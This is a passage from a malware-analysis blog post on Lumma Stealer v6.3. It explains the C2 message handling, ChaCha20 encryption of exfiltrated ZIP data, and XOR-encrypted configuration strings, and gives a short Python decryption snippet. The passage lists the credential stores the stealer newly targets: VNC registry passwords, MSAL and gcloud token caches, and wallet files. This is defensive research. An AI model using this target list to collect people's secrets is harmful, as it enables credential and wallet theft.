&lt;p&gt;Although the format of the communication has been obfuscated, its logical structure remains largely intact. The protocol still clearly separates the three main phases of the interaction. However, to identify whether a message matches &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt;, it is now necessary to check for the presence or absence of the &lt;code class=&quot;language-text&quot;&gt;hwid&lt;/code&gt; parameter.&lt;/p&gt;
&lt;p&gt;In the next sections I will look in detail at the new encryption scheme and all the various changes it brings.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;retrieve-configuration-and-commands&quot;&gt;&lt;/a&gt;Retrieve configuration and commands&lt;/h2&gt;
&lt;p&gt;To replicate and analyze the behavior of the sample, I again captured the entire communication flow using CAPEv2 and implemented a &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/fakenet/02-lummastealer_v6.3_fakenet/&quot;&gt;Python HTTPS server&lt;/a&gt; that replayed, byte-for-byte, the responses associated with the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; commands, as observed during the dynamic analysis.&lt;/p&gt;
&lt;p&gt;What makes this step of the analysis particularly noteworthy is that the execution path again reaches the &lt;code class=&quot;language-text&quot;&gt;lumma_new_decryption()&lt;/code&gt; function, previously discussed in detail. However, unlike the previous case involving the decryption of hardcoded C2 domains, the decryption mechanism now features a crucial difference: both the key and the nonce are directly derived from the ciphertext itself. This design choice is not entirely new in the context of Lumma Stealer; in fact, if we think about the previous version of the malware, where the XOR decryption key (32 bytes) was located at the beginning of the ciphertext.&lt;/p&gt;
&lt;p&gt;In the following image, the right terminal shows the output of the script used to emulate the responses recorded by CAPEv2, while the left shows x64dbg pausing just before the call to &lt;code class=&quot;language-text&quot;&gt;lumma_new_decryption()&lt;/code&gt;. As highlighted, the first 32 bytes of the payload are extracted and used as the encryption key, followed by 8 bytes used as the nonce. The counter, however, is set to zero since the ciphertext is initialized for each ciphertext.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/5275ab574400140e5c40c6a2e5dda3bc/809ab/dynamic%20analysis%20-%20x64dbg%204.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 55.208333333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAACh0lEQVR42j2SS0wTURSGZ++OuDCRV0wMBVnJwgSKkkBLjRs3GhF5NSa2FArsWVQNJoiyMi50ayBxQWJCoiGgRpRigdI2aemDdqbTdqbt3Jm5874zfYzDxuSsTvLl/84DYwCbJwiSyBZLRLVK8hzFsSUOFCFXkQQo8JwAgCQIAs+Pzb/tdvptjvnrw3NXbrnHFtexpgZZGi+cJ0g8lsfDipitSbguZg2JMnWocJRCZhoKJ8NM/4S35ebj1v6ZtoHpS70P77sDWBMJbIXkKyRDJ3kmXlfxukrUlVxdpU1dVCHDFpKKkAQw7XIHOm/7epyLPc6l9sHZSd8a1tAEhsZltqTLlYbKmDpoakwTMQ2VNZEoQyKa+H6eO8VTCed4oGPQ2zU8bxvxXx149mR2FTMkjqvSHF1iywRDpRVYRFIZSbSlrWskxSbj8TCgCxBQo5OBdrvH5vDbRhZaBzwXcOjk7+HvncPg9mlkjy6egXKkQv0R2FiKCEXTxzpfRoBC1uRM0TX5vN3utWJ7nBfwuHcV2wsdBEPf9sNbJ+FtUcyk4W6w+OkIbJ8S0Xw6aRpCU+VNBGsScE1ZsKdrxN/tsLQ9E7OvsVQ0EgnGor8i+UQOibypS3UkKUiuUvnCedw0xKZmNYWawt6dfnGR7LDghTa7d8JKPjoI7u3+3P+xn0nFZYlVVQHKsGlITMm639l/2JDBPffLa0O+G6OLva6lzju+qbk17Cx+nCRO0tkwX801FLaBeKTwZk2kiDSeillYQ+UsbV0CQ4+WL/fNdNg91s5b+twPnq5gDKA5scrCiixDXVMMTakhq1TrvXgO6Eg1kFrTVUUSP27uvHq/tfbhy5t3n1fWNzY3vv4DAlbmEgUnw1sAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - x64dbg 4&quot; title=&quot;&quot; src=&quot;/website/static/5275ab574400140e5c40c6a2e5dda3bc/71c1d/dynamic%20analysis%20-%20x64dbg%204.png&quot; srcset=&quot;/website/static/5275ab574400140e5c40c6a2e5dda3bc/804b2/dynamic%20analysis%20-%20x64dbg%204.png 384w,
/website/static/5275ab574400140e5c40c6a2e5dda3bc/e5715/dynamic%20analysis%20-%20x64dbg%204.png 768w,
/website/static/5275ab574400140e5c40c6a2e5dda3bc/71c1d/dynamic%20analysis%20-%20x64dbg%204.png 1536w,
/website/static/5275ab574400140e5c40c6a2e5dda3bc/809ab/dynamic%20analysis%20-%20x64dbg%204.png 1633w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;All the previous deductions regarding the ChaCha20-based decryption routine remain valid, with the only difference being the way the ciphertext is initialized. The decryption method just discussed applies to responses received from both &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt;. To validate this behavior, I implemented a &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/06-lummastealer_v6.3_communication_decryption_proof/&quot;&gt;Python script&lt;/a&gt; that replicates the decryption logic.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;exfiltrate-stolen-data&quot;&gt;&lt;/a&gt;Exfiltrate stolen data&lt;/h2&gt;
&lt;p&gt;Dynamic analysis shows that the data exfiltration phase has also been updated: in fact, unlike previous versions, the ZIP file is no longer visible in clear text within the traffic, but is encrypted in some way.&lt;/p&gt;
&lt;p&gt;Once again we return to the invocation of the same function &lt;code class=&quot;language-text&quot;&gt;lumma_new_decryption()&lt;/code&gt;, which in this context is used to encrypt (and not decrypt) the data to be sent. It is worth remembering that ChaCha20 is a symmetric stream cipher: it uses the same algorithm for both encryption and decryption. In fact, ChaCha20 applies a XOR operation between the data to be encrypted and a pseudo-random stream generated from a key and a nonce.&lt;/p&gt;
&lt;p&gt;The image below clearly highlights the parameters provided as input to the function.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/190dfda1409df2078899c9cd2ecfd59b/ec5f6/dynamic%20analysis%20-%20x64dbg%205.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 44.27083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAAAsTAAALEwEAmpwYAAACGklEQVR42h3OT2vTYADH8b6HHUQ2qogW51GQ4VwFpxV2EYUhViYIG7a1a+vFm1ehONe9Br0KU3AKInaKc2zFds2fNl2aJ0nzp02aNEnzJGmTtotx8Lt++P5CmmZ0ZbnX6/b7KoSaafagaTi27VqW1hZ6qqRrClSkgaH/PMQ/fPnz+cffne+l7Y/FveJhCGoSDwiWQjqdumu1PMgO+iIUmLEhg6MSwKosWlUBOdKlB4n81NWn5xeSF24+n7q2+jCZDzmmokktQ6Ftgz4ZiBNHGNmSJtDDDs0SCFvDWjiqcsxk2H+cK5yLpq7cfREsvJB8knkbsk3FkHlHF10YSMl3u2NXZ/CqeIxTdbSFIiyG9lp0gB9lNqfnE5HbmchiZuZGYiXAAkuygOAYQukAQ+FksamAukHijsiwNZRAMYYgRJqGmhzPFoLg5VhuNpYLR0/LjUa5AcptkRzZmu9ZaofjmzXf7vl9uYmUd/cOivv7xyxh2mo8uzV9/VnkTibwM/OJlfRGCEcrOFIWQMMzFX8EdZmXOMr3oH/iUAT+afvb152i2gbmQInntk7L2dlYNhxN/b/dxCoAO+IIdGjI/tjSJE6gahOo+JYKasiv3d/lgxKURMuR7yXzZ+fWLi2uX7yVPjO3Fk+9CfEM1eZA8NazDX/kmLrSbfOe3R8NzBYgkQpCopilSkNXf1l4dz+xsbxeWE4XllZfv9p8/w9Yd5CouQNLgQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - x64dbg 5&quot; title=&quot;&quot; src=&quot;/website/static/190dfda1409df2078899c9cd2ecfd59b/71c1d/dynamic%20analysis%20-%20x64dbg%205.png&quot; srcset=&quot;/website/static/190dfda1409df2078899c9cd2ecfd59b/804b2/dynamic%20analysis%20-%20x64dbg%205.png 384w,
/website/static/190dfda1409df2078899c9cd2ecfd59b/e5715/dynamic%20analysis%20-%20x64dbg%205.png 768w,
/website/static/190dfda1409df2078899c9cd2ecfd59b/71c1d/dynamic%20analysis%20-%20x64dbg%205.png 1536w,
/website/static/190dfda1409df2078899c9cd2ecfd59b/ec5f6/dynamic%20analysis%20-%20x64dbg%205.png 1852w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;The second argument, corresponding to the buffer to be encrypted, contains a ZIP archive, as confirmed by the presence of the magic number &lt;code class=&quot;language-text&quot;&gt;PK&lt;/code&gt;. This suggests that the structure of the exfiltrated file has not been altered by this update: what changes is only the way the content is protected through encryption.&lt;/p&gt;
&lt;p&gt;The first parameter instead shows the initialization of the cipher, containing the key and the nonce used to generate the ChaCha20 stream.&lt;/p&gt;
&lt;p&gt;Finally, in the terminal on the right, the output of the &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/fakenet/02-lummastealer_v6.3_fakenet/&quot;&gt;Python script&lt;/a&gt; used to emulate an HTTPS server is visible. Note how, in this phase, unlike the decryption of the command configurations, the key and the nonce are not placed at the beginning, but at the end of the encrypted payload.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;update-01042025-strings-encryption&quot;&gt;&lt;/a&gt;Update 01/04/2025: Strings encryption&lt;/h1&gt;
&lt;h2&gt;&lt;a id=&quot;retrieved-configuration-strings-are-also-encrypted&quot;&gt;&lt;/a&gt;Retrieved configuration strings are also encrypted&lt;/h2&gt;
&lt;p&gt;In this update, a change has been observed in the handling of commands sent by the C2 server in response to the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; command. In previous versions, the content of the JSON file sent by the server (after decryption with XOR or ChaCha20) was cleartext, as in the following example (simplified for clarity):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;v&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;se&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;ad&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;vm&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;ex&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;...&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;mx&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;webextension@metamask.io&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;ez&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MetaMask&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;et&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;\&quot;params\&quot;:{\&quot;iterations\&quot;:600000}&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;c&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;...&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In newer versions, all text values ​​are encrypted instead. Here is a representative example of the &lt;code class=&quot;language-text&quot;&gt;mx&lt;/code&gt; section:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;json&quot;&gt;&lt;pre class=&quot;language-json&quot;&gt;&lt;code class=&quot;language-json&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;v&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;se&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;ad&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;vm&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;ex&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;...&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;mx&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Ci1CgzXEg0F9LSeDV8TmQXItNoNQxO1BeS0rg1rE7UFKLS+DUMT3QWstL4NUxPBBYS1sg1zE7EE=&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;ez&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Ci1CgzXEg0FHLSeDQcTiQUctI4NGxOhB&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token property&quot;&gt;&quot;et&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Ci1CgzXEg0EoLTKDVMTxQWstL4NGxKFBMC05gxfE6kF+LSeDR8TiQX4tK4NaxO1BeS1ggw\\/EtUE6LXKDBcSzQTotP4M=&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token property&quot;&gt;&quot;c&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;...&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;By decoding the strings in base64, we obtain binary data, which has an interesting feature: the first 8 bytes of each encrypted blob are identical, suggesting that these constitute the key used for a symmetric XOR operation (similar to the decryption of the configurations with lummav4).&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;encs &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;b&quot;\n-B\x835\xc4\x83A}-&apos;\x83W\xc4\xe6Ar-6\x83P\xc4\xedAy-+\x83Z \xc4\xedAJ-/\x83P\xc4\xf7Ak-/\x83T\xc4\xf0Aa-l\x83\\\xc4\xecA&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;b&quot;\n-B\x835\xc4\x83AG-&apos;\x83A\xc4\xe2AG-#\x83F\xc4\xe8A&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;b&quot;\n-B\x835\xc4\x83A(-2\x83T\xc4\xf1Ak-/\x83F\xc4\xa1A0-9\x83\x17\xc4\xeaA~-&apos;\x83G\xc4\xe2A~-+\x83Z\xc4\xedAy-`\x83\x0f\xc4\xb5A:-r\x83\x05\xc4\xb3A:-?\x83&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A quick implementation to see if it works or not:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; enc &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; encs&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  key &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; enc&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;8&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;
  xored &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;bytearray&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;enc&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;^&lt;/span&gt; key&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; i &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;range&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;enc&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;# null (`\x00`) byte removal, presumably introduced as padding&lt;/span&gt;
  dec &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;bytes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; i &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; xored&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;strip&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;b&quot;\x00&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;bytes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;b&quot;\x00&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;b&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;join&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;dec&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;decode&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Decrypted output:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;webextension@metamask.io
MetaMask
&quot;params&quot;:{&quot;iterations&quot;:600000}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To generalize this intuition I wrote a &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/07-lummastealer_v6.3_json_file_strings_decryption/&quot;&gt;Python script&lt;/a&gt; that decrypts the entire json file. Below I report the additions made between &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/03-lummastealer_v4_communication_decryption_proof/&quot;&gt;version 4&lt;/a&gt; and &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/07-lummastealer_v6.3_json_file_strings_decryption/&quot;&gt;version 6.3&lt;/a&gt; (at the latest update) of the json file:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Browser extension&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Blade Wallet (&lt;code class=&quot;language-text&quot;&gt;abogmiocnneedmmepnohnhlijcjpcifd&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Folders&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;%appdata%\Armory&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;*.wallet&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;%appdata%\gcloud&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;*.db&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;*.json&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;%localappdata%\.IdentityService&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;msal.cache&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;msalv2.cache&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;UltraVNC&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;ultravnc.ini&lt;/code&gt; from &lt;code class=&quot;language-text&quot;&gt;%programw6432%&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;%programfiles%&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Registries&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;\\REGISTRY\\MACHINE\\SOFTWARE\\TightVNC\\Server&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;Password&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;\\REGISTRY\\MACHINE\\SOFTWARE\\TightVNC\\Server&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;ControlPassword&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;\\REGISTRY\\MACHINE\\SOFTWARE\\RealVNC\\vncserver&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;Password&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;\\REGISTRY\\CURRENT_USER\\Software\\TigerVNC\\WinVNC4&lt;/code&gt; → &lt;code class=&quot;language-text&quot;&gt;Password&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
